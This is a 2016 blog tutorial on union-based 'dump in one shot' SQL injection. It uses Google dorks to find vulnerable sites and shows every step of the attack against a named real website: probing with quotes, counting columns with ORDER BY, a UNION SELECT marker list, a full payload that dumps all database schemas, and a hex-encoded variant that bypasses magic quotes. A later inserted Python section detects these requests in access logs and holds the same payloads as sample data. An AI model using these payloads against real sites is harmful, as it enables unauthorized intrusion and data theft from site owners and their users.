Saturday, April 16, 2016

Union Based DIOS (Dump In One Shot) SQL Injection

!! FOR EDUCATION PURPOSES ONLY !!

I Introduction
Hey guys! Today I'm gonna teach you how to do DIOS in union-based SQL injection.

II Learning Basics
So here we go again, you need to learn the basics. Of course you already know it, I just want to repeat lol.

1) Google dorks
What are Google dorks?
Google dorks are search operators used for more targeted searching, like "inurl" and "intext".

Why do we need that?
No, we really don't need that. Just kidding, of course we need that to find target websites!

How do we use it?
For example, go to Google and search: " inurl:news.php?id= "
You'll see results like www.website.com/news.php?id=5

II Finding target
Google: " inurl:news.php?id= "
You can make your own Google dork if you want; the common dorks are

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19
inurl:buy.php?id=19

So get some target and let's start.

III Checking if vulnerable to SQL Injection

After getting a website target, we will now check if it's vulnerable to SQL injection or not.
For example, this is my target: http://jornaldacidadearuja.com.br/guia/det.php?id=19

You'll add a single quote " ' " to the end of the number
http://jornaldacidadearuja.com.br/guia/det.php?id=19'

Now if you see an error message, or the page doesn't look normal, then there's a chance that it's vulnerable to SQL injection.
But if the page loads normally, too bad. It's not vulnerable.

What to do if it's not vulnerable?
Of course, find another website xD

IV Counting vulnerable columns
After you find it vulnerable to SQL injection, it's time to count the columns using order by.
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 1--
Increase the number until you get an error.

http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 1-- ("No error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 2-- ("No error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 10-- ("No error?!")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 100000-- ("No error?!!")

So if that happens, you've reached 99999 and still get no error,
that means the ID is a string, not an integer.

So how will we fix it?
Just add " ' " right after the number and " + " at the end.
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 1--+

Start:
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 10--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 20--+ ("ERROR")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 15--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 16--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 17--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 18--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 19--+ ("Error!!!!")

There we go! We know that there are 18 columns. Now we will check which column is injectable!

V Getting injectable column
Now that we know there are 18 columns, we will find the injectable column.
Our payload will be " and false union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 "
So the URL will be http://jornaldacidadearuja.com.br/guia/det.php?id=19' and false union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
Heyy! Column 6 is the injectable column.

VI DIOS ( Dump In One Shot )
Our payload for Dump In One Shot is:
(select (@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,' ',column_name), (column_name))))))a)
And voila! Dumped in one shot!

VII Magic Quotes enabled
If it didn't work for you, then let's say magic quotes are enabled.
What are magic quotes?
Magic quotes replace " ' " with " \' ".
How to bypass it?
It's easy. Just hex-encode those string literals. The payload will be:
(select(@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,0x203a3a20,@tbl:=table_name,0x20,column_name), (column_name))))))a)
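As an added example from the defender's side (not code from the original post), here is a small Python detector for the requests shown in sections IV to VII: it URL-decodes access-log request lines, decodes MySQL 0x.. hex literals back to text so the hex-encoded magic-quotes variant matches the same rule as the quoted one, and flags the order-by probes, the union marker list and the DIOS dump. The log lines, client IP and timestamps are constructed.

```python
import re
from urllib.parse import unquote_plus

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")      # MySQL hex string literals, e.g. 0x3c62723e
REQUEST_PATH = re.compile(r'"(?:GET|POST) (\S+)')   # request target in a combined-format log line

# One rule per step of the tutorial: ORDER BY probing, the UNION marker list, the DIOS dump.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*--", re.I),
    "union_marker": re.compile(r"\bunion\s+select\s+\d+(?:\s*,\s*\d+)+", re.I),
    "dios_dump": re.compile(r"information_schema\.columns.*@\w+\s*:=\s*concat", re.I | re.S),
}

def decode_hex_literals(sql: str) -> str:
    """Turn each 0x.. literal that decodes to printable text back into a quoted string.
    Magic quotes only escape quote characters, so hex literals slip past it; decoding them
    first makes 0x696e666f726d6174696f6e5f736368656d61 match exactly like 'information_schema'."""
    def to_text(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)  # odd digit count: MySQL reads it as a number, not a string
        text = bytes.fromhex(digits).decode("latin-1")
        return f"'{text}'" if text.isprintable() else m.group(0)
    return HEX_LITERAL.sub(to_text, sql)

def normalize(request_path: str) -> str:
    """URL-decode the request target (+ becomes space, as in the --+ terminator) and unhide hex."""
    return decode_hex_literals(unquote_plus(request_path))

def classify(log_line: str) -> list[str]:
    """Names of every signature that matches one access-log line (empty list if clean)."""
    m = REQUEST_PATH.search(log_line)
    if not m:
        return []
    text = normalize(m.group(1))
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan(lines: list[str]) -> dict[int, list[str]]:
    """Line index -> matched signatures, for the lines that matched anything."""
    return {i: hits for i, hits in ((i, classify(l)) for i, l in enumerate(lines)) if hits}

# Constructed sample log lines (client IP and timestamps made up) following the tutorial's steps.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Apr/2016:10:00:01 +0000] "GET /guia/det.php?id=19 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [16/Apr/2016:10:00:09 +0000] "GET /guia/det.php?id=19%27%20order%20by%2018--+ HTTP/1.1" 200 5120',
    '10.0.0.5 - - [16/Apr/2016:10:00:15 +0000] "GET /guia/det.php?id=19%27%20and%20false%20union%20select%201,2,3,4,5,6--+ HTTP/1.1" 200 4870',
    '10.0.0.5 - - [16/Apr/2016:10:00:31 +0000] "GET /guia/det.php?id=19%27%20union%20select%201,2,3,4,5,(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@a:=concat(@a,0x3c62723e,column_name))))a),7--+ HTTP/1.1" 200 9031',
]
```

Calling `scan(SAMPLE_LOG)` leaves the clean first line out and reports the probe, the marker list, and both the marker list and the dump for the last line.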

VIII Goodbye
So I hope you learned something in this tutorial. If you have any questions or feedback, please feel free to comment!
